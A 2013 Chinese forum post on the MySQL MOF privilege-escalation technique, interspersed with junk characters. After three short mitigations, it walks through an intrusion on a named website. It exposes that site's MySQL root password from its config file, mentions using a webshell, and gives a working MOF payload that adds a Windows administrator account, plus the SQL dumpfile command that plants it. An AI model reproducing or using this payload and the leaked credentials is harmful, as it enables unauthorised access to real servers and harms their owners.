Mysql mof扩展漏洞防范方法
0 |6 T) T" }/ |5 M6 x2 B- ]3 M \+ T5 P- ]+ W7 ^
网上公开的一些利用代码:
+ n5 ?; ^% @& R# d) g
% e4 H( c0 u4 Q2 d#pragma namespace(“\\\\.\\root\\subscription”)
" \& {. H9 U; y+ P' K
4 p9 e& L7 n. Dinstance of __EventFilter as $EventFilter { EventNamespace = “Root\\Cimv2″; Name = “filtP2″; Query = “Select * From __InstanceModificationEvent ” “Where TargetInstance Isa \”Win32_LocalTime\” ” “And TargetInstance.Second = 5″; QueryLanguage = “WQL”; }; instance of ActiveScriptEventConsumer as $Consumer { Name = “consPCSV2″; ScriptingEngine = “JScript”; ScriptText = “var WSH = new ActiveXObject(\”WScript.Shell\”)\nWSH.run(\”net.exe user admin admin /add\”)”; }; instance of __FilterToConsumerBinding { Consumer = $Consumer; Filter = $EventFilter; };; o. V+ P2 q4 ]' F* m$ c+ m+ Z
. l. @4 M7 Y2 Y. { v8 m
# i& m N4 ?: r/ L( t7 q& n) w# W8 w7 [ Q, B+ Y
" B. D; d- W$ ?' R
- k4 J+ M! l$ o* {连接mysql数据库后执行: select load_file(‘C:\\RECYCLER\\nullevt.mof’) into dumpfile ‘c:/windows/system32/wbem/mof/nullevt.mof’;* l# s) {: K, n" b+ N
从上面代码来看得出解决办法:* f3 j' a1 o8 f+ |
0 D. i/ V* `7 @4 R# f' e) a
1、mysql用户权限控制,禁止 “load_file”、”dumpfile”等函数
7 R9 Z( Q1 \$ @5 a0 K' J% G) `( C2 u( x! Z& z
2、禁止使用”WScript.Shel”组件( k: }2 y# Z7 r5 F" x
/ f' W2 s7 K. [) U( A7 c3 ^3、目录权限c:/windows/system32/wbem/mof/ 删除内置特殊组CREATOR OWNER
& K% _5 _* S! t' Z5 m
# i# ~. }( R6 F7 [' W/ y% r当然上面是网上说的 感觉需要的权限很大 比如 root 还有mysql外链昨天碰到了就给大家演示下% N+ j- M+ V4 ~+ O2 z# A
' E K; N+ y, N+ ?- N9 Q3 ~6 f
事情是这样发生的 一机油在论坛提问我就看了下 发现已经有大牛搞下了 说是用是 mysql mof扩展提权% M" q. v, X& E1 ^# G* u" c7 H
D$ D+ M6 P! J
但是小菜发现没有听过于是赶紧去查资料学习…就有了上面的来着网上的内容! E$ F( F, u* F5 z% f$ G
7 d, ]* V: X* y }* t( B看懂了后就开始练手吧- |% Z$ [4 Q* o0 w
+ Z. f: |: s& Z( A0 {2 ]$ W: [* s5 l9 O
http://www.webbmw.com/config/config_ucenter.php 一句话 a% Q, K1 N- a: q3 w" ]: d- t
. }. C" F/ ~+ O$_config['db']['1']['dbhost'] = ‘localhost’; $_config['db']['1']['dbuser'] = ‘root’; $_config['db']['1']['dbpw'] = ‘tfr226206′; $_config['db']['1']['dbcharset'] = ‘gbk’; $_config['db']['1']['pconnect'] = ’0′; $_config['db']['1']['dbname'] = ‘webbmw’; $_config['db']['1']['tablepre'] = ‘pre_’; $_config['db']['common']['slave_except_table'] = ”; 有root密码啊。1 m: D: g3 o$ b- I: w" d
, \7 ^! }8 A" N4 W于是直接用菜刀开搞
9 i1 u0 m- U8 M/ W5 b9 C
, G3 b' [2 q& M) y1 a% Q) q上马先( \' ^8 v# A: }( g% _& K
% U. r" ?7 r. \% d/ Q0 n既然有了那些账号 之类的 于是我们就执行吧…….4 r H/ t; D' p
' [ v+ `" G- A& M0 ?; f, h小小的说下
! N: c2 _* ^, T# k' x0 M+ z& x- \* M& r; r
在这里第1次执行未成功 原因未知
2 u' A: m) g) [# P' m" M4 |5 t/ r
我就猜想是否是因为我们执行的代码有问题 于是我就去我wooyun找的代码。
/ V- W+ q' k, |+ B. x
9 h V8 E* t$ T& q; t#pragma namespace(“\\\\.\\root\\subscription”)5 [' ?! @; l0 R+ n6 _
, p& h/ A- h% v+ A7 tinstance of __EventFilter as $EventFilter { EventNamespace = “Root\\Cimv2″; Name = “filtP2″; Query = “Select * From __InstanceModificationEvent ” “Where TargetInstance Isa \”Win32_LocalTime\” ” “And TargetInstance.Second = 5″; QueryLanguage = “WQL”; }; instance of ActiveScriptEventConsumer as $Consumer { Name = “consPCSV2″; ScriptingEngine = “JScript”; ScriptText = “var WSH = new ActiveXObject(\”WScript.Shell\”)\nWSH.run(\”net.exe user test test /add\”)”; }; instance of __FilterToConsumerBinding { Consumer = $Consumer; Filter = $EventFilter; };
8 D6 X% P5 q E" N! ~* }
9 N+ W3 S- v9 H T! g* V; L我是将文件放到C:\WINDOWS\temp\1.mof" X/ _! t& X/ r x2 N1 D
2 f% U4 L' }& ?' l
所以我们就改下执行的代码
- ^( c0 B" T( M' h; E' S8 Q; `2 Y' Y( q$ e/ f- j( s9 H
select load_file(‘C:\WINDOWS\temp\1.mof‘) into dumpfile ‘c:/windows/system32/wbem/mof/nullevt.mof’;) v3 b3 o D7 f
4 n! c6 E9 a, G
( s |: K$ Y) Y) I* G
% D: c4 d/ h1 e0 g# p( T3 k但是 你会发现账号还是没有躺在那里。。: J! U2 Y. O( p# @
' i; Q4 d8 k _3 i0 S
于是我就感觉蛋疼
$ @" ~( }$ _& S0 Y4 h+ `1 S) |3 `1 i% O/ Z: U5 ~- M
就去一个一个去执行 但是执行到第2个 mysql时就成功了………, S) ^2 O% r% p2 F4 |* t9 ^0 Q1 w- e3 l
9 x" S0 L- z: b! G: _3 j: d
: C+ m% C. I; V3 |
$ `: c5 s i& ]1 c9 j1 i* O9 l* i但是其他库均不成功…
, {7 m% W3 t! l- ?# w$ A( b) e6 d3 s1 k/ [/ F! d3 ?
我就很费解呀 到底为什么不成功求大牛解答…
# H: `; P$ P; J% L4 ]7 @3 q8 @% C
" h, Q, w2 ]3 @% s. D3 f& b
) w+ ?' W9 L7 e. r3 ~6 G& U+ w+ z2 k: ?9 _
|
发表于 2013-1-4 19:49:49
收藏
支持
反对